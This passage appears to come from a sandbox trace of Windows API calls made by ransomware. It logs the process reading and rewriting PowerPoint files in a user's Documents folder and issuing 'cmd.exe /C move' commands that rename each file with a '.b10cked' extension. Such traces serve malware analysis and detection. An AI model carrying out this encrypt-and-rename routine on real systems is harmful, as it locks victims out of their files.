dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x391a [0233.970] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.970] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.970] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.970] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3e02 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3e02 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.971] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1f00, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1f00, lpOverlapped=0x0) returned 1 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.971] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1f00, lpOverlapped=0x0) returned 1 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7936, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1f02 [0233.971] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1f00, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1f00, lpOverlapped=0x0) returned 1 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7936, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1f02 [0233.971] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1f00, lpOverlapped=0x0) returned 1 [0233.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UFl3tyKJKu.ppt", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0233.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UFl3tyKJKu.ppt", cchWideChar=14, lpMultiByteStr=0x131322c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UFl3tyKJKu.ppt", lpUsedDefaultChar=0x0) returned 14 [0233.975] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3e02 [0233.975] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.975] CloseHandle (hObject=0x1b4) returned 1 [0233.976] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\UFl3tyKJKu.ppt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT") returned 0x2f [0233.977] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.977] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc24, dwThreadId=0x794)) returned 1 [0233.987] CloseHandle (hObject=0x120) returned 1 [0233.987] CloseHandle (hObject=0x1b4) returned 1 [0233.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.987] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 2 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\wj5g.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29077694539) returned 1 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x748 [0233.989] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, 
lpOverlapped=0x0) returned 1 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc30 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc30 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.990] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x617, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x617, lpOverlapped=0x0) returned 1 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.990] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, 
nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x617, lpOverlapped=0x0) returned 1 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1559, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x619 [0233.990] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x617, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x617, lpOverlapped=0x0) returned 1 [0233.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1559, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x619 [0233.991] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x617, lpOverlapped=0x0) returned 1 [0234.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wj5G.ppt", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0234.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wj5G.ppt", cchWideChar=8, lpMultiByteStr=0x13131ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wj5G.ppt", lpUsedDefaultChar=0x0) returned 8 [0234.099] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc30 [0234.099] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0234.100] CloseHandle (hObject=0x1b4) returned 1 [0234.100] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\wj5G.ppt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt") returned 0x2b [0234.101] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0234.101] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xfa8, dwThreadId=0xb1c)) returned 1 [0234.131] CloseHandle (hObject=0x120) returned 1 [0234.131] CloseHandle (hObject=0x1b4) returned 1 [0234.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0234.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0234.131] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 2 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fUt5wrAPeTu.pptx" (normalized: "c:\\users\\eebsym5\\documents\\fut5wrapetu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] 